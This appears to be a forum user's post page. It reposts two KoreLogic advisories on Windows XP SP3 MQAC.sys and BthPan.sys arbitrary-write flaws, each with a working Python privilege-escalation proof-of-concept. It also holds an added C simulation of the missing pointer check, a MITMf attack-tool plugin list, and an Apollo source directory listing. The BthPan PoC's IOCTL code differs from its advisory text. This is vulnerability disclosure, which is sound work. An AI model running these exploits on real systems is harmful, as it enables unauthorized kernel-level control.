Everything posted by Nytro
-
Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Authored by Matthew Bergin

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft MQ Access Control version 5.1.0.1110 on XP SP3 is affected.

Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-003
Publication Date: 2014.07.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: MQ Access Control
Affected Versions: 5.1.0.1110
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d
b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d
b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31
b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70
b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver.

FOLLOWUP_IP:
mqac!AC2QM+5d
b230af37 891e            mov     dword ptr [esi],ebx

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)
ErrCode = 00000002
eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000
eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
mqac!AC2QM+0x5d:
b230af37 891e            mov     dword ptr [esi],ebx  ds:0023:ffff0000=????????

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept

#!/usr/bin/python2
#
# KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them

def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\MQAC @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\x50\x00\x00\x00"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

Source: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation - Packet Storm
-
Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Authored by Matthew Bergin

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft Bluetooth Personal Area Networking version 5.1.2600.5512 on XP SP3 is affected.

Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt

1. Vulnerability Details

Affected Vendor: Microsoft
Affected Product: Bluetooth Personal Area Networking
Affected Versions: 5.1.2600.5512
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971

2. Vulnerability Description

A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000.

STACK_TEXT:
b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.

Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver.

FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2            jmp     bthpan!BthpanReqAdd+0x12f (b272b565)

Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase.

TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)
ErrCode = 00000002
eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0         nv up ei pl nz na po cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

None. A patch is not likely to be forthcoming from the vendor.

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc.

6. Disclosure Timeline

2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number.
2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide.
2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities.
2014.07.18 - Public disclosure.

7. Proof of Concept

#!/usr/bin/python2
#
# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit

EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them

def getBase(name=None):
    retArray = c_ulong*1024
    ImageBase = retArray()
    callback = c_int(1024)
    cbNeeded = c_long()
    EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
    for base in ImageBase:
        driverName = c_char_p("\x00"*1024)
        GetDeviceDriverBaseNameA(base,driverName,48)
        if (name):
            if (driverName.value.lower() == name):
                return base
        else:
            return (base,driverName.value)
    return None

handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == INVALID_HANDLE_VALUE):
    print "[!] Could not open handle to BthPan"
    exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

Source: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation - Packet Storm
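Added example, written for this page and not part of either KoreLogic advisory or its PoC: it serves both the MQAC and the BthPan posts above. It decodes the IOCTL control codes the advisories name (0x1965020f and 0x0012b814) with the documented CTL_CODE bit layout, then models the missing check in a small user-mode simulation. The simulated address space, the four-entry table standing in for HalDispatchTable, the two handlers and the value 0x7FFF0000 for MmUserProbeAddress (32-bit Windows with the default 2 GB user space) are constructed stand-ins; probe_for_write follows the contract of the kernel's ProbeForWrite (reject misaligned ranges and anything that reaches kernel space) but does not touch pages the way the real routine does. The vulnerable handler writes wherever the caller's OutputBuffer points, which is the write-what-where condition; the hardened one probes first.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* NTSTATUS values used below (the real numeric codes). */
typedef uint32_t NTSTATUS;
#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method. */
#define METHOD_BUFFERED 0u
#define METHOD_NEITHER  3u   /* driver receives raw user pointers and must probe them itself */

typedef struct { uint32_t device_type, access, function, method; } ctl_fields;

ctl_fields decode_ctl_code(uint32_t code) {
    ctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Constructed 32-bit address space: one user page and a 4-entry "kernel table"
 * that stands in for HalDispatchTable. Nothing here is a real Windows structure. */
#define MM_USER_PROBE_ADDRESS 0x7FFF0000u   /* 32-bit x86, default 2 GB user space */
#define SIM_USER_BASE         0x00010000u
#define SIM_KERNEL_BASE       0x80550000u   /* constructed kernel address */
static uint8_t  sim_user_page[0x1000];
static uint32_t sim_kernel_table[4] = { 0xDEAD0000u, 0xDEAD0001u, 0xDEAD0002u, 0xDEAD0003u };

/* Map a simulated address range to backing storage; NULL when unmapped. */
static uint8_t *sim_map(uint32_t addr, size_t len) {
    if (addr >= SIM_USER_BASE && (size_t)addr + len <= SIM_USER_BASE + sizeof sim_user_page)
        return sim_user_page + (addr - SIM_USER_BASE);
    if (addr >= SIM_KERNEL_BASE && (size_t)addr + len <= SIM_KERNEL_BASE + sizeof sim_kernel_table)
        return (uint8_t *)sim_kernel_table + (addr - SIM_KERNEL_BASE);
    return NULL;
}

/* Same contract as ProbeForWrite: the range must be aligned and lie entirely
 * below MmUserProbeAddress. (The real routine also touches every page.) */
NTSTATUS probe_for_write(uint32_t addr, uint32_t len, uint32_t align) {
    if (len == 0) return STATUS_SUCCESS;
    if (addr % align != 0) return STATUS_DATATYPE_MISALIGNMENT;
    if (addr + len < addr) return STATUS_ACCESS_VIOLATION;          /* end wraps around */
    if (addr + len > MM_USER_PROBE_ADDRESS) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* METHOD_NEITHER handler as the advisories describe it: OutputBuffer is a raw
 * caller-supplied pointer and is written without validation (write-what-where). */
NTSTATUS ioctl_handler_vulnerable(uint32_t out_addr, uint32_t value) {
    uint8_t *dst = sim_map(out_addr, sizeof value);
    if (!dst) return STATUS_ACCESS_VIOLATION;  /* unmapped, e.g. 0xffff0000: the fault in the crash dump */
    memcpy(dst, &value, sizeof value);         /* lands in the kernel table if out_addr points there */
    return STATUS_SUCCESS;
}

/* Hardened handler: probe the pointer first, so a kernel address is refused
 * before anything is written. */
NTSTATUS ioctl_handler_hardened(uint32_t out_addr, uint32_t value) {
    NTSTATUS st = probe_for_write(out_addr, sizeof value, sizeof value);
    if (st != STATUS_SUCCESS) return st;
    return ioctl_handler_vulnerable(out_addr, value);  /* range is now known to be user-mode */
}

uint32_t sim_kernel_entry(size_t i) { return sim_kernel_table[i]; }

int main(void) {
    ctl_fields f = decode_ctl_code(0x1965020fu);   /* MQAC control code from the advisory */
    uint32_t target = SIM_KERNEL_BASE + 4;          /* analogue of HalDispatchTable+0x4 */
    NTSTATUS st;
    printf("0x1965020f: type=0x%x func=0x%x access=%u method=%u (3 = METHOD_NEITHER)\n",
           f.device_type, f.function, f.access, f.method);
    st = ioctl_handler_hardened(target, 0x42424242u);
    printf("hardened:   status=0x%08x entry[1]=0x%08x\n", st, sim_kernel_entry(1));
    st = ioctl_handler_vulnerable(target, 0x41414141u);
    printf("vulnerable: status=0x%08x entry[1]=0x%08x\n", st, sim_kernel_entry(1));
    return 0;
}
```

The decode is the triage step: 0x1965020f has method 3 (METHOD_NEITHER), so the I/O manager hands the driver the raw user pointers and the driver alone is responsible for probing them, which is exactly the check the MQAC handler skips. In the simulation the hardened handler returns STATUS_ACCESS_VIOLATION for the kernel-table address and leaves the table untouched, while the vulnerable handler overwrites entry 1.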
-
MITMf: Framework for Man-In-The-Middle attacks

Quick tutorial and examples at Trying to take the dum-dum out of security...

This tool is completely based on sergio-proxy https://code.google.com/p/sergio-proxy/ and is an attempt to revive and update the project.

Available plugins:
- ArpSpoof - Redirect traffic using arp-spoofing
- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
- CacheKill - Kills page caching by modifying headers
- FilePwn - Backdoor executables being sent over http using bdfactory
- Inject - Inject arbitrary content into HTML content
- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
- jskeylogger - Injects a javascript keylogger into clients webpages
- Replace - Replace arbitrary content in HTML content
- SMBAuth - Evoke SMB challenge-response auth attempts
- Upsidedownternet - Flips images 180 degrees

Source: https://github.com/byt3bl33d3r/MITMf
-
Index of /apollo/listings/Comanche055

Name                                              Last modified       Size
Parent Directory                                                      -
AGC_BLOCK_TWO_SELF-CHECK.agc.html                 27-Jul-2009 19:49   94K
ALARM_AND_ABORT.agc.html                          27-Jul-2009 19:49   35K
ANGLFIND.agc.html                                 27-Jul-2009 19:49   98K
ASSEMBLY_AND_OPERATION_INFORMATION.agc.html       27-Jul-2009 19:49  175K
AUTOMATIC_MANEUVERS.agc.html                      27-Jul-2009 19:49   83K
Apollo32.png                                      27-Jul-2009 19:49  2.6K
CM_BODY_ATTITUDE.agc.html                         27-Jul-2009 19:49   49K
CM_ENTRY_DIGITAL_AUTOPILOT.agc.html               27-Jul-2009 19:49  212K
CONIC_SUBROUTINES.agc.html                        27-Jul-2009 19:49  301K
CONTRACT_AND_APPROVALS.agc.html                   27-Jul-2009 19:49   13K
CSM_GEOMETRY.agc.html                             27-Jul-2009 19:49   64K
DISPLAY_INTERFACE_ROUTINES.agc.html               27-Jul-2009 19:49  242K
DOWN-TELEMETRY_PROGRAM.agc.html                   27-Jul-2009 19:49   81K
DOWNLINK_LISTS.agc.html                           27-Jul-2009 19:49   76K
ENTRY_LEXICON.agc.html                            27-Jul-2009 19:49   56K
ERASABLE_ASSIGNMENTS.agc.html                     27-Jul-2009 19:49  642K
EXECUTIVE.agc.html                                27-Jul-2009 19:49   82K
EXTENDED_VERBS.agc.html                           27-Jul-2009 19:49  214K
FIXED_FIXED_CONSTANT_POOL.agc.html                27-Jul-2009 19:49   48K
FRESH_START_AND_RESTART.agc.html                  27-Jul-2009 19:49  239K
GIMBAL_LOCK_AVOIDANCE.agc.html                    27-Jul-2009 19:49   14K
GROUND_TRACKING_DETERMINATION_PROGRAM.agc.html    27-Jul-2009 19:49   34K
IMU_CALIBRATION_AND_ALIGNMENT.agc.html            27-Jul-2009 19:49  226K
IMU_COMPENSATION_PACKAGE.agc.html                 27-Jul-2009 19:49   64K
IMU_MODE_SWITCHING_ROUTINES.agc.html              27-Jul-2009 19:49  169K
INFLIGHT_ALIGNMENT_ROUTINES.agc.html              27-Jul-2009 19:49   45K
INTEGRATION_INITIALIZATION.agc.html               27-Jul-2009 19:49  188K
INTER-BANK_COMMUNICATION.agc.html                 27-Jul-2009 19:49   32K
INTERPRETER.agc.html                              27-Jul-2009 19:49  507K
INTERPRETIVE_CONSTANTS.agc.html                   27-Jul-2009 19:49   12K
INTERRUPT_LEAD_INS.agc.html                       27-Jul-2009 19:49   19K
JET_SELECTION_LOGIC.agc.html                      27-Jul-2009 19:49  155K
KALCMANU_STEERING.agc.html                        27-Jul-2009 19:49   45K
KEYRUPT_UPRUPT.agc.html                           27-Jul-2009 19:49   24K
LATITUDE_LONGITUDE_SUBROUTINES.agc.html           27-Jul-2009 19:49   49K
LUNAR_AND_SOLAR_EPHEMERIDES_SUBROUTINES.agc.html  27-Jul-2009 19:49   32K
LUNAR_LANDMARK_SELECTION_FOR_CM.agc.html          27-Jul-2009 19:49  6.2K
MAIN.agc.html                                     27-Jul-2009 19:49  296K
MEASUREMENT_INCORPORATION.agc.html                27-Jul-2009 19:49   80K
MYSUBS.agc.html                                   27-Jul-2009 19:49   16K
ORBITAL_INTEGRATION.agc.html                      27-Jul-2009 19:49  145K
P11.agc.html                                      27-Jul-2009 19:49  149K
P20-P25.agc.html                                  27-Jul-2009 19:49  579K
P30-P37.agc.html                                  27-Jul-2009 19:49   95K
P32-P33_P72-P73.agc.html                          27-Jul-2009 19:49  218K
P34-35_P74-75.agc.html                            27-Jul-2009 19:49  275K
P37_P70.agc.html                                  27-Jul-2009 19:49  313K
P40-P47.agc.html                                  27-Jul-2009 19:49  395K
P51-P53.agc.html                                  27-Jul-2009 19:49  347K
P61-P67.agc.html                                  27-Jul-2009 19:49  192K
P76.agc.html                                      27-Jul-2009 19:49   28K
PHASE_TABLE_MAINTENANCE.agc.html                  27-Jul-2009 19:49   66K
PINBALL_GAME_BUTTONS_AND_LIGHTS.agc.html          27-Jul-2009 19:49  653K
PINBALL_NOUN_TABLES.agc.html                      27-Jul-2009 19:49  158K
PLANETARY_INERTIAL_ORIENTATION.agc.html           27-Jul-2009 19:49   61K
POWERED_FLIGHT_SUBROUTINES.agc.html               27-Jul-2009 19:49   60K
R30.agc.html                                      27-Jul-2009 19:49   87K
R31.agc.html                                      27-Jul-2009 19:49   48K
R60_62.agc.html                                   27-Jul-2009 19:49   64K
RCS-CSM_DAP_EXECUTIVE_PROGRAMS.agc.html           27-Jul-2009 19:49   15K
RCS-CSM_DIGITAL_AUTOPILOT.agc.html                27-Jul-2009 19:49  164K
REENTRY_CONTROL.agc.html                          27-Jul-2009 19:49  242K
RESTARTS_ROUTINE.agc.html                         27-Jul-2009 19:49   52K
RESTART_TABLES.agc.html                           27-Jul-2009 19:49   81K
RT8_OP_CODES.agc.html                             27-Jul-2009 19:49   56K
S-BAND_ANTENNA_FOR_CM.agc.html                    27-Jul-2009 19:49   24K
SERVICER207.agc.html                              27-Jul-2009 19:49  121K
SERVICE_ROUTINES.agc.html                         27-Jul-2009 19:49   42K
SINGLE_PRECISION_SUBROUTINES.agc.html             27-Jul-2009 19:49   12K
STABLE_ORBIT.agc.html                             27-Jul-2009 19:49   68K
STAR_TABLES.agc.html                              27-Jul-2009 19:49   27K
SXTMARK.agc.html                                  27-Jul-2009 19:49  105K
SYSTEM_TEST_STANDARD_LEAD_INS.agc.html            27-Jul-2009 19:49   22K
T4RUPT_PROGRAM.agc.html                           27-Jul-2009 19:49  232K
TAGS_FOR_RELATIVE_SETLOC.agc.html                 27-Jul-2009 19:49   66K
TIME_OF_FREE_FALL.agc.html                        27-Jul-2009 19:49  118K
TPI_SEARCH.agc.html                               27-Jul-2009 19:49   91K
TVCDAPS.agc.html                                  27-Jul-2009 19:49  124K
TVCEXECUTIVE.agc.html                             27-Jul-2009 19:49   46K
